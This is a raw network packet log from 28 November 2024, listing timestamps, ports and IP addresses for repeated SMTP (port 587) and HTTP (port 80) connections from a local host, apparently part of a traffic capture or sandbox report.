Nov 28, 2024 06:43:28.095154047 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:28.156668901 CET	587	49913	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:28.157099962 CET	49913	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:28.216661930 CET	80	49915	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:28.218864918 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:28.220305920 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:28.574374914 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:28.698229074 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:28.699408054 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:28.700248957 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:28.700268030 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:28.824069023 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:28.824098110 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:29.512679100 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:29.522195101 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:29.646029949 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:29.934513092 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:29.938678980 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:30.062536001 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.068065882 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:30.068259954 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:30.068350077 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:30.071754932 CET	49917	80	192.168.2.4	54.244.188.177
Nov 28, 2024 06:43:30.195408106 CET	80	49917	54.244.188.177	192.168.2.4
Nov 28, 2024 06:43:30.351437092 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.351880074 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:30.475598097 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.548949003 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:30.672837973 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:30.673008919 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:30.673346043 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:30.673362017 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:30.769613028 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.769625902 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.769638062 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:30.769684076 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:30.771760941 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:30.797125101 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:30.797135115 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:30.895493984 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:31.183902979 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:31.188944101 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:31.312691927 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:31.601083040 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:31.604825020 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:31.728537083 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.017141104 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.017358065 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:32.141140938 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.432085037 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.432269096 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:32.556067944 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.844480991 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:32.844755888 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:32.968666077 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.260673046 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.260857105 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.384624004 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.673012018 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.675894976 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.675975084 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.676006079 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.676054001 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.677362919 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.799770117 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.799782991 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.799791098 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.799866915 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.799896955 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801098108 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801106930 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801126957 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801194906 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801230907 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801258087 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801286936 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801295996 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801305056 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801314116 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801353931 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.801371098 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.801553965 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.923481941 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.923505068 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.923532963 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.923571110 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.923599005 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.923697948 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.924799919 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.924868107 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.924900055 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925029993 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925056934 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925138950 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925165892 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925246954 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925276995 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925374985 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925401926 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925497055 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925529003 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.925666094 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.925693989 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.928944111 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:33.968091965 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:33.968153000 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:34.047408104 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.047494888 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.047543049 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.047584057 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:34.047612906 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:34.048795938 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.048873901 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:34.048940897 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049046040 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049246073 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049284935 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049410105 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049427986 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049551010 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049606085 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049664021 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049760103 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049770117 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.049843073 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.052721024 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.052741051 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.052819014 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.052828074 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.092180014 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.092196941 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171575069 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171592951 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171757936 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171792984 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171850920 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.171897888 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172032118 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172046900 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172153950 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172168970 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172261953 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172276974 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:34.172537088 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:48.139168978 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:48.218369961 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:48.265319109 CET	587	49916	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:48.265366077 CET	49916	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:48.342165947 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:48.342237949 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:49.621330976 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:49.623207092 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:49.747025013 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.055493116 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.055758953 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:50.179959059 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.219887972 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:50.220005035 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:50.220526934 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:50.223824978 CET	49918	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:50.347560883 CET	80	49918	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:50.468648911 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.476196051 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:50.601680994 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.725996971 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:50.849864960 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:50.849997044 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:50.850570917 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:50.850593090 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:50.893794060 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.893825054 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.893841028 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:50.893898010 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:50.897545099 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:50.974246979 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:50.974502087 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:51.021373034 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:51.309807062 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:51.312359095 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:51.436255932 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:51.724828005 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:51.725048065 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:51.848917007 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:51.950675964 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:51.950699091 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:51.950762987 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:51.950874090 CET	49920	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:52.075064898 CET	80	49920	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:52.137593031 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:52.137937069 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:52.261794090 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:52.424006939 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:52.547825098 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:52.549079895 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:52.549348116 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:52.549709082 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:52.552747965 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:52.553071022 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:52.673067093 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:52.673403025 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:52.676749945 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:52.965217113 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:52.965495110 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.089698076 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.383842945 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.384069920 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.507914066 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.698502064 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:53.698564053 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:53.698642015 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:53.698745012 CET	49921	80	192.168.2.4	44.221.84.105
Nov 28, 2024 06:43:53.796178102 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.796489954 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.796555042 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.796581984 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.796627998 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.798329115 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.822504997 CET	80	49921	44.221.84.105	192.168.2.4
Nov 28, 2024 06:43:53.920445919 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.920458078 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.920466900 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.920479059 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.920504093 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.920550108 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.922034979 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.922050953 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.922097921 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.922111988 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.922156096 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.946253061 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.946265936 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.946280003 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.946289062 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.946357965 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:53.987879992 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.987890005 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:53.987986088 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.044308901 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.044375896 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.044404030 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.044616938 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.046138048 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.046148062 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.046212912 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.046226025 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.046504021 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.070403099 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.070414066 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.070496082 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.112083912 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.112096071 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.112153053 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.112186909 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.168379068 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:54.168381929 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.168459892 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:54.170006037 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.170016050 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.170219898 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.170452118 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194259882 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194385052 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194479942 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194488049 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194519043 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194582939 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194677114 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194685936 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194729090 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194737911 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194778919 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.194788933 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236175060 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236186028 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236229897 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236278057 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236321926 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236330986 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236418962 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.236428022 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292361021 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:54.292375088 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292385101 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292395115 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292414904 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292427063 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292443991 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292454958 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:54.292509079 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.292722940 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:54.292772055 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:54.416477919 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:54.416522980 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:54.697962999 CET	587	49919	51.195.88.199	192.168.2.4
Nov 28, 2024 06:43:54.829152107 CET	49919	587	192.168.2.4	51.195.88.199
Nov 28, 2024 06:43:56.412149906 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:56.412415028 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:56.412508011 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:56.452928066 CET	49922	80	192.168.2.4	18.141.10.107
Nov 28, 2024 06:43:56.576699972 CET	80	49922	18.141.10.107	192.168.2.4
Nov 28, 2024 06:43:57.264271975 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:57.388245106 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:57.388334036 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:57.388668060 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:57.388720036 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:57.512523890 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:57.512537003 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:58.812531948 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:58.812654018 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:58.812741041 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:58.812943935 CET	49923	80	192.168.2.4	18.246.231.120
Nov 28, 2024 06:43:58.937031984 CET	80	49923	18.246.231.120	192.168.2.4
Nov 28, 2024 06:43:59.297456980 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:59.421345949 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:59.421422958 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:59.421588898 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:59.421617985 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:43:59.545444012 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:43:59.545455933 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:00.572279930 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:00.572318077 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:00.573692083 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:00.581043005 CET	49924	80	192.168.2.4	18.208.156.248
Nov 28, 2024 06:44:00.704771996 CET	80	49924	18.208.156.248	192.168.2.4
Nov 28, 2024 06:44:01.391707897 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:01.515785933 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:01.515852928 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:01.516628981 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:01.516700029 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:01.640460968 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:01.640489101 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:03.556330919 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:03.556440115 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:03.556566954 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:03.556603909 CET	49925	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:03.680501938 CET	80	49925	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:04.043934107 CET	49926	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:04.445662975 CET	80	49926	13.251.16.150	192.168.2.4
Nov 28, 2024 06:44:04.445734978 CET	49926	80	192.168.2.4	13.251.16.150
Nov 28, 2024 06:44:04.445992947 CET	49926	80	192.168.2.4	13.251.16.150
